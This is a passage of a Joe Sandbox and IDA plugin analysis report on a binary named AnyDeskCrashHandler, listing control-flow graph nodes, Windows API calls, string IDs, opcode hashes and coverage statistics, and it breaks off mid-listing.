6158 7ff7aa9512d4 6157->6158 6159 7ff7aa951313 6158->6159 6725 7ff7aa9523f0 6158->6725 6162 7ff7aa952650 _log10_special 4 API calls 6159->6162 6161 7ff7aa951433 6163 7ff7aa9523f0 36 API calls 6161->6163 6164 7ff7aa951612 6162->6164 6165 7ff7aa95144e 6163->6165 6192 7ff7aa953140 GetModuleHandleW 6164->6192 6166 7ff7aa951557 6165->6166 6168 7ff7aa9514db 6165->6168 6166->6159 6167 7ff7aa95161d 6166->6167 6752 7ff7aa956c50 6167->6752 6739 7ff7aa9567f8 6168->6739 6173 7ff7aa951623 CloseHandle 6174 7ff7aa95162c 6173->6174 6179 7ff7aa9523f0 36 API calls 6174->6179 6175 7ff7aa951503 Sleep OpenProcess 6175->6174 6176 7ff7aa951525 GetExitCodeProcess 6175->6176 6176->6173 6177 7ff7aa95153a 6176->6177 6177->6173 6178 7ff7aa951547 CloseHandle 6177->6178 6178->6175 6180 7ff7aa951ac3 6179->6180 6747 7ff7aa9511c0 CreateProcessW 6180->6747 6182 7ff7aa951ad4 6183 7ff7aa9523f0 36 API calls 6182->6183 6184 7ff7aa95207a 6183->6184 6185 7ff7aa9511c0 8 API calls 6184->6185 6186 7ff7aa95208e 6185->6186 6188 7ff7aa955f3f 6187->6188 6189 7ff7aa955f60 6187->6189 6188->6129 6837 7ff7aa957dc8 6189->6837 6193 7ff7aa9528e9 6192->6193 6193->6126 6193->6140 6195 7ff7aa952e05 6194->6195 6196 7ff7aa952900 6195->6196 6197 7ff7aa95403c RtlDeleteCriticalSection 6195->6197 6196->6125 6197->6196 6199 7ff7aa952fda _invalid_parameter_noinfo_noreturn __scrt_get_show_window_mode 6198->6199 6200 7ff7aa952ff9 RtlCaptureContext RtlLookupFunctionEntry 6199->6200 6201 7ff7aa953022 RtlVirtualUnwind 6200->6201 6202 7ff7aa95305e __scrt_get_show_window_mode 6200->6202 6201->6202 6203 7ff7aa953090 IsDebuggerPresent 6202->6203 6204 7ff7aa961068 _invalid_parameter_noinfo_noreturn 6203->6204 6205 7ff7aa9530cf UnhandledExceptionFilter 6204->6205 6206 7ff7aa9530de _invalid_parameter_noinfo_noreturn 6205->6206 6206->6123 6208 7ff7aa952959 6207->6208 6209 7ff7aa952e97 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6207->6209 6209->6208 6211 7ff7aa95404e 6210->6211 6212 7ff7aa954044 

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$Process$CommandLine_invalid_parameter_noinfo_noreturn$ArgvCodeConcurrency::cancel_current_taskCreateExitObjectOpenSingleSleepWait
                                                                                                      • String ID: "$1$4$E$O$^$^$c$e$e$e$f$f$g$g$k$o$q$q$u$v$v$y${
                                                                                                      • API String ID: 2156799773-2036417650
                                                                                                      • Opcode ID: 55396bdfbc0e32f47eca3f0b08b3f9269952f8e0748cca96d6bd72cea9e19cbb
                                                                                                      • Instruction ID: 19226b8963e33826b7fdf7547bb55d06f13c431aba2bb5a7a4a892657a4d53f2
                                                                                                      • Opcode Fuzzy Hash: 55396bdfbc0e32f47eca3f0b08b3f9269952f8e0748cca96d6bd72cea9e19cbb
                                                                                                      • Instruction Fuzzy Hash: EA82325AA16252C9F320BF71E4012FD73F0FF18709B419076EA888B675EB7D9446C72A

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
• Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: b30e28bd0cd48f27bf1a31ff5ea156d3804f5e8b499c2477a6b867bb355f5e73
• Instruction ID: e63d7ebdd406cb08e0deaee27dafcd4962fb7c491c817fdb7a58a57c3bf11ef8
• Opcode Fuzzy Hash: b30e28bd0cd48f27bf1a31ff5ea156d3804f5e8b499c2477a6b867bb355f5e73
• Instruction Fuzzy Hash: 1241C125B1AA12C5FE15AB1698116B5A291BF49BA0F874175DD0EC77A4EF3CE40B8320

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
• Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: CloseHandle$CreateObjectProcessSingleWait
• String ID: h
• API String ID: 2059082233-2439710439
• Opcode ID: 5b8cf0092febe8dd4bed2618a947a67060a1088977b281d69a45aa787853e3eb
• Instruction ID: 05a3a8be96edc1ca54a77a4dd8bc0f0d6ac34b8f37e6d69283514dc491c2bfab
• Opcode Fuzzy Hash: 5b8cf0092febe8dd4bed2618a947a67060a1088977b281d69a45aa787853e3eb
• Instruction Fuzzy Hash: 8F113B23E1DBC1C2E750DB24E85436EB3A0FBD9784F525339EA9D86A24DF78D0958B00

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
• Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 538b37713ac9a40f89ee0efd905f114fa4b6245a37a66674d184e74d9b678618
• Instruction ID: e824600cc66b3554a6a647ee6659cad667f46d275ce807b955f9f80b2745b625
• Opcode Fuzzy Hash: 538b37713ac9a40f89ee0efd905f114fa4b6245a37a66674d184e74d9b678618
• Instruction Fuzzy Hash: 79D06720B1A646D2FE587B71689A17892115F48745F9615BCC90EC73A3DE2EA80F8321

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
• Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: __scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3070443116-0
• Opcode ID: 4fc66f674771a642c276f3b7107815a4453248af2fe5cf5af13cbfa4e39b06b6
• Instruction ID: 4b9fdce453c25e1b6182bd71b6e2cca11d28f97ea71e0cab70650d7db260d5d0
• Opcode Fuzzy Hash: 4fc66f674771a642c276f3b7107815a4453248af2fe5cf5af13cbfa4e39b06b6
• Instruction Fuzzy Hash: D0310711E0A243C1FE58BB6595533B9A290AF51344FD604B9EA0ECB2F3DE2CA54F8731

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
• Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: 096c50b28ef02ac97b7fbb41d5ffc398b2530bbda9989156a02e9da1b299d600
• Instruction ID: 05951b23d8aa0ce08f56e2779035b228aae8716c7447f7e8b7391a56888dd2f1
• Opcode Fuzzy Hash: 096c50b28ef02ac97b7fbb41d5ffc398b2530bbda9989156a02e9da1b299d600
• Instruction Fuzzy Hash: A221BF32E06606C9FF24AF64C4453AC33A0EB04318F950639DA1C86AE6DF79D54ACBA0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
• Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 8f52d899b0c822738a6be879117695353cf3926ba201aa6cbb5a93e39f724cd6
• Instruction ID: a23a383e7b7f6aaed305a7b41020d7c4c865cd28d214ce86bad0d1ca290f9228
• Opcode Fuzzy Hash: 8f52d899b0c822738a6be879117695353cf3926ba201aa6cbb5a93e39f724cd6
• Instruction Fuzzy Hash: 0331127260AB81C5FB60AF60E8503EE7364FB84744F55407ADA4D87BA9DF38D549C710

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
• Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: e2ea2adcc270ce3856cbe536865dde51c27872e812a40651d9b59811c8af80ab
• Instruction ID: 583480adee616b36ca2f86d55203680ff014d15e669d41d47758e1cc60c1f6b1
• Opcode Fuzzy Hash: e2ea2adcc270ce3856cbe536865dde51c27872e812a40651d9b59811c8af80ab
• Instruction Fuzzy Hash: 6B317632619B82C5EF60DF25E8412ADB3A0FB89754F950175EA8D83B64DF3CD54ACB10

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 199 7ff7aa954688-7ff7aa9546f0 call 7ff7aa9555ac 202 7ff7aa9546f6-7ff7aa9546f9 199->202 203 7ff7aa954b51-7ff7aa954b57 call 7ff7aa957df4 199->203 202->203 204 7ff7aa9546ff-7ff7aa954705 202->204 206 7ff7aa95470b-7ff7aa95470f 204->206 207 7ff7aa9547d4-7ff7aa9547e6 204->207 206->207 211 7ff7aa954715-7ff7aa954720 206->211 209 7ff7aa9547ec-7ff7aa9547f0 207->209 210 7ff7aa954aa1-7ff7aa954aa5 207->210 209->210 212 7ff7aa9547f6-7ff7aa954801 209->212 214 7ff7aa954ade-7ff7aa954ae8 call 7ff7aa9540a0 210->214 215 7ff7aa954aa7-7ff7aa954aae 210->215 211->207 213 7ff7aa954726-7ff7aa95472b 211->213 212->210 216 7ff7aa954807-7ff7aa95480b 212->216 213->207 217 7ff7aa954731-7ff7aa95473b call 7ff7aa9540a0 213->217 214->203 228 7ff7aa954aea-7ff7aa954b09 call 7ff7aa952650 214->228 215->203 218 7ff7aa954ab4-7ff7aa954ad9 call 7ff7aa954b58 215->218 220 7ff7aa9549d1-7ff7aa9549dd 216->220 221 7ff7aa954811-7ff7aa95484c call 7ff7aa953788 216->221 217->228 232 7ff7aa954741-7ff7aa95476c call 7ff7aa9540a0 * 2 call 7ff7aa953a90 217->232 218->214 220->214 225 7ff7aa9549e3-7ff7aa9549e7 220->225 221->220 237 7ff7aa954852-7ff7aa95485b 221->237 229 7ff7aa9549f7-7ff7aa9549ff 225->229 230 7ff7aa9549e9-7ff7aa9549f5 call 7ff7aa953a50 225->230 229->214 236 7ff7aa954a05-7ff7aa954a12 call 7ff7aa953628 229->236 230->229 243 7ff7aa954a18-7ff7aa954a20 230->243 267 7ff7aa95478c-7ff7aa954796 call 7ff7aa9540a0 232->267 268 7ff7aa95476e-7ff7aa954772 232->268 236->214 236->243 241 7ff7aa95485f-7ff7aa954891 237->241 245 7ff7aa954897-7ff7aa9548a3 241->245 246 7ff7aa9549c4-7ff7aa9549cb 241->246 248 7ff7aa954b34-7ff7aa954b50 call 7ff7aa9540a0 * 2 call 7ff7aa957dc8 243->248 249 7ff7aa954a26-7ff7aa954a2a 243->249 245->246 250 7ff7aa9548a9-7ff7aa9548c8 245->250 246->220 246->241 248->203 252 7ff7aa954a2c-7ff7aa954a3b call 7ff7aa953a50 249->252 253 7ff7aa954a3d 249->253 254 7ff7aa9548ce-7ff7aa95490b call 
7ff7aa953a64 * 2 250->254 255 7ff7aa9549b4-7ff7aa9549b9 250->255 262 7ff7aa954a3f-7ff7aa954a49 call 7ff7aa955644 252->262 253->262 279 7ff7aa95493e-7ff7aa954941 254->279 255->246 262->214 276 7ff7aa954a4f-7ff7aa954a9f call 7ff7aa9536b8 call 7ff7aa9538bc 262->276 267->207 282 7ff7aa954798-7ff7aa9547b8 call 7ff7aa9540a0 * 2 call 7ff7aa955644 267->282 268->267 273 7ff7aa954774-7ff7aa95477f 268->273 273->267 275 7ff7aa954781-7ff7aa954786 273->275 275->203 275->267 276->214 285 7ff7aa95490d-7ff7aa954933 call 7ff7aa953a64 call 7ff7aa954dc8 279->285 286 7ff7aa954943-7ff7aa95494a 279->286 304 7ff7aa9547ba-7ff7aa9547c4 call 7ff7aa955734 282->304 305 7ff7aa9547cf 282->305 300 7ff7aa954955-7ff7aa9549b2 call 7ff7aa9545b4 285->300 301 7ff7aa954935-7ff7aa954938 285->301 290 7ff7aa9549bb 286->290 291 7ff7aa95494c-7ff7aa954950 286->291 295 7ff7aa9549c0 290->295 291->254 295->246 300->295 301->279 309 7ff7aa954b2e-7ff7aa954b33 call 7ff7aa957dc8 304->309 310 7ff7aa9547ca-7ff7aa954b2d call 7ff7aa953bf0 call 7ff7aa955184 call 7ff7aa953d54 304->310 305->207 309->248 310->309
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$p$p
• API String ID: 3215553584-1995029353
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF7AA9568F3,?,?,00000000,00007FF7AA956B8E,?,?,?,?,?,00007FF7AA956B1A), ref: 00007FF7AA95895F
• FlsSetValue.KERNEL32(?,?,?,00007FF7AA9568F3,?,?,00000000,00007FF7AA956B8E,?,?,?,?,?,00007FF7AA956B1A), ref: 00007FF7AA95897E
• FlsSetValue.KERNEL32(?,?,?,00007FF7AA9568F3,?,?,00000000,00007FF7AA956B8E,?,?,?,?,?,00007FF7AA956B1A), ref: 00007FF7AA9589A6
• FlsSetValue.KERNEL32(?,?,?,00007FF7AA9568F3,?,?,00000000,00007FF7AA956B8E,?,?,?,?,?,00007FF7AA956B1A), ref: 00007FF7AA9589B7
• FlsSetValue.KERNEL32(?,?,?,00007FF7AA9568F3,?,?,00000000,00007FF7AA956B8E,?,?,?,?,?,00007FF7AA956B1A), ref: 00007FF7AA9589C8
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
                                                                                                      • Opcode ID: f6039cc51b31b971df3d7eac73341f43604306b93230684e8f15fcec3a0ebfc6
                                                                                                      • Instruction ID: 2892654dce70bb1fe8e8b4d073b08becb2a5cc16f6f73291f3275b32df124a25
                                                                                                      • Opcode Fuzzy Hash: f6039cc51b31b971df3d7eac73341f43604306b93230684e8f15fcec3a0ebfc6
                                                                                                      • Instruction Fuzzy Hash: 99113A10E0F20BC5FD58B261441317991418F40374EDA87B5EA3EC92F2ED2CB40BA322
                                                                                                      APIs
                                                                                                      Strings
Memory Dump Source
• Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
• Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373

Execution Graph

Execution Coverage: 8.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 943
Total number of Limit Nodes: 50
23910->23912 23913 7ff71ddaea3c 23911->23913 23932 7ff71ddaeb0b 23912->23932 23988 7ff71dda9a04 23 API calls 2 library calls 23912->23988 23915 7ff71ddaea53 23913->23915 23916 7ff71ddaea44 23913->23916 23986 7ff71dda9a04 23 API calls 2 library calls 23915->23986 23918 7ff71ddab1d8 __free_lconv_mon 5 API calls 23916->23918 23918->23903 23921 7ff71ddaeb1e 23921->23920 23924 7ff71dda4bc4 _set_fmode 5 API calls 23921->23924 23922 7ff71ddab1d8 __free_lconv_mon 5 API calls 23922->23920 23923 7ff71ddaea65 23923->23920 23987 7ff71ddb98d4 23 API calls 2 library calls 23923->23987 23930 7ff71ddaeb27 23924->23930 23926 7ff71ddaea7b 23926->23920 23927 7ff71ddab1d8 __free_lconv_mon 5 API calls 23926->23927 23927->23904 23929 7ff71ddaf474 26 API calls 23929->23930 23930->23920 23930->23929 23931 7ff71ddaeb66 23930->23931 23930->23932 23989 7ff71dda9a04 23 API calls 2 library calls 23930->23989 23933 7ff71dda4bc4 _set_fmode 5 API calls 23931->23933 23932->23922 23934 7ff71ddaeb6b 23933->23934 23935 7ff71ddaebac 51 API calls 23934->23935 23935->23932 23937 7ff71ddaebdf 23936->23937 23938 7ff71ddaebf8 23936->23938 23939 7ff71dda4bc4 _set_fmode 5 API calls 23937->23939 23938->23937 23941 7ff71ddaec03 23938->23941 23942 7ff71ddaec0d 23938->23942 23940 7ff71ddaebe4 23939->23940 24043 7ff71dda4a58 23 API calls _invalid_parameter_noinfo 23940->24043 23944 7ff71dda4ba4 _fread_nolock 5 API calls 23941->23944 23990 7ff71ddb9c38 23942->23990 23944->23937 23947 7ff71ddaec30 23948 7ff71ddab1d8 __free_lconv_mon 5 API calls 23947->23948 23950 7ff71ddaec39 23948->23950 23952 7ff71ddab1d8 __free_lconv_mon 5 API calls 23950->23952 23984 7ff71ddaebef 23952->23984 23953 7ff71ddab1d8 __free_lconv_mon 5 API calls 23953->23947 23954 7ff71dda4ba4 _fread_nolock 5 API calls 23955 7ff71ddaec7f _fread_nolock 23954->23955 24016 7ff71ddb9d9c 23955->24016 23958 7ff71ddaedff BuildCatchObjectHelperInternal 23959 7ff71ddaed52 __vcrt_getptd_noinit 24044 7ff71dda4b38 5 API calls 2 library calls 23959->24044 23960 
7ff71ddaed84 23962 7ff71ddaed8a 23960->23962 23963 7ff71ddaedae 23960->23963 23961 7ff71ddaed0c WaitForSingleObject GetExitCodeProcess 23961->23959 23964 7ff71ddaed2a 23961->23964 23966 7ff71ddaed8f CloseHandle 23962->23966 23967 7ff71ddaed98 23962->23967 23970 7ff71ddaedb3 CloseHandle 23963->23970 23971 7ff71ddaedbc 23963->23971 23968 7ff71ddaed33 CloseHandle 23964->23968 23969 7ff71ddaed3c 23964->23969 23966->23967 23973 7ff71ddaec6b 23967->23973 23974 7ff71ddaed9d CloseHandle 23967->23974 23968->23969 23969->23973 23975 7ff71ddaed41 CloseHandle 23969->23975 23970->23971 23976 7ff71ddab1d8 __free_lconv_mon 5 API calls 23971->23976 23972 7ff71ddaed5f 23977 7ff71ddaed64 CloseHandle 23972->23977 23978 7ff71ddaed6d 23972->23978 23973->23953 23974->23973 23975->23973 23980 7ff71ddaedc5 23976->23980 23977->23978 23978->23973 23979 7ff71ddaed76 CloseHandle 23978->23979 23979->23973 23981 7ff71ddab1d8 __free_lconv_mon 5 API calls 23980->23981 23982 7ff71ddaedd2 23981->23982 23983 7ff71ddab1d8 __free_lconv_mon 5 API calls 23982->23983 23983->23984 23984->23920 23985->23903 23986->23923 23987->23926 23988->23921 23989->23930 23991 7ff71ddb9c6f 23990->23991 23992 7ff71ddab160 _Getctype 5 API calls 23991->23992 23993 7ff71ddb9ca5 23992->23993 23994 7ff71ddb9cad 23993->23994 24004 7ff71ddb9cc3 23993->24004 24045 7ff71dda4b38 5 API calls 2 library calls 23994->24045 23996 7ff71ddb9cba 23999 7ff71ddab1d8 __free_lconv_mon 5 API calls 23996->23999 23997 7ff71ddb9cb5 24000 7ff71dda4bc4 _set_fmode 5 API calls 23997->24000 24002 7ff71ddb9d24 23999->24002 24000->23996 24001 7ff71ddb9d89 24003 7ff71ddb9d49 24002->24003 24047 7ff71ddb9940 41 API calls 7 library calls 24002->24047 24006 7ff71ddab1d8 __free_lconv_mon 5 API calls 24003->24006 24004->23996 24004->24001 24046 7ff71dda9a04 23 API calls 2 library calls 24004->24046 24008 7ff71ddaec28 24006->24008 24007 7ff71ddb9d3b 24009 7ff71ddb9d3f 24007->24009 24010 7ff71ddb9d4b 24007->24010 24008->23947 24013 7ff71ddaf004 24008->24013 
24011 7ff71ddab1d8 __free_lconv_mon 5 API calls 24009->24011 24012 7ff71ddab1d8 __free_lconv_mon 5 API calls 24010->24012 24011->24003 24012->24003 24048 7ff71ddae91c 24013->24048 24015 7ff71ddaec67 24015->23954 24015->23973 24017 7ff71dda6178 TranslateName 23 API calls 24016->24017 24018 7ff71ddb9e26 24017->24018 24020 7ff71ddb9e35 24018->24020 24063 7ff71ddab4e8 GetProcAddress __crtLCMapStringW 24018->24063 24021 7ff71dda6af4 6 API calls 24020->24021 24022 7ff71ddb9e98 24021->24022 24023 7ff71ddba001 24022->24023 24024 7ff71dda6178 TranslateName 23 API calls 24022->24024 24026 7ff71ddba012 24023->24026 24027 7ff71ddab1d8 __free_lconv_mon 5 API calls 24023->24027 24025 7ff71ddb9eac 24024->24025 24033 7ff71ddb9eb6 24025->24033 24064 7ff71ddab4e8 GetProcAddress __crtLCMapStringW 24025->24064 24028 7ff71ddba021 24026->24028 24029 7ff71ddab1d8 __free_lconv_mon 5 API calls 24026->24029 24027->24026 24030 7ff71ddaecf1 24028->24030 24032 